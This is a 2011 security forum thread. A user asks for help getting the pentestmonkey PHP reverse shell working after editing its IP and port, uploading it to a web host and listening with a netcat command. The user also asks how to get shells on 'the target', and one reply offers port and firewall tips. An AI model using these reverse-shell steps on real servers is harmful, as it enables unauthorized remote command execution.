.

[help]issues with setting up reverse php shell.

<<

manoj9372

Jr. Member
Jr. Member

Posts: 72

Joined: Mon Oct 05, 2009 8:54 am

Post Sun Sep 04, 2011 9:42 pm

[help]issues with setting up reverse php shell.

As the topic says,i had some issues with setting up a reverse php shell

i downloaded this php-reverse shell
  Code:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell



And i modified this part
  Code:
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS




with my ip address  and port 135(that is the only open port i found in my pc during port scan )
i am using xp-sp2 for this purpose.


and i saved the file, and uploaded to the web-host .

and i opened the php-reverse shell in my browser and after that i opened  netcat and typed the following command as mentioned in the tutorial

  Code:
$ nc -v -n -l -p 135



But i am getting like this

  Code:
http://i55.tinypic.com/2hnneck.jpg


i dont know what went wrong,also i am having dynamic ip,i dont like to set-up the whole thing each and every time,


here are my questions :
1)what is the problem in my set-up
2)and what should i do in order to avoid the uploading and changing the configuration of  php-reverse shell each time?
3)Also does php function restrictions and safe mode if set to ON will have impact on the reverse shell set-up?

4)Or from your experience please suggest me a best way/tutorial to get a reverse shell from the target.
because i would like to play with kernel exploits,execute os commands and other funny things.


hope i will find some help here..



EDIT:

i had successfully resolved the port problem
and but still i couldnt get a sucessfull back connection
  Code:
http://i51.tinypic.com/2ivma8y.jpg

may it is happening due to php function restrictions ?
Last edited by manoj9372 on Mon Sep 05, 2011 2:28 am, edited 1 time in total.
<<

TheXero

User avatar

Full Member
Full Member

Posts: 112

Joined: Tue Dec 07, 2010 12:24 pm

Post Mon Sep 05, 2011 3:06 am

Re: [help]issues with setting up reverse php shell.

Don't use an already used port.

Try the default port 1234 :)

You may need to also tweak you're firewall settings.
Last edited by TheXero on Mon Sep 05, 2011 3:08 am, edited 1 time in total.

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software